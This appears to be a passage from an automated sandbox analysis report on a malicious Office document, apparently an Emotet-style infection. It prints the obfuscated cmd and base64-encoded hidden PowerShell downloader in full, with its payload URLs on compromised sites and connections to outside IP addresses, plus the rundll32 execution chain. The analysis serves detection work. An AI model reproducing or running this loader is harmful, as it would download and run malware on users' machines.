                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00711D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002612C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00341D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00781D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003C12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004312C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00761D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00171D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002712C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 217.160.169.110 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuAC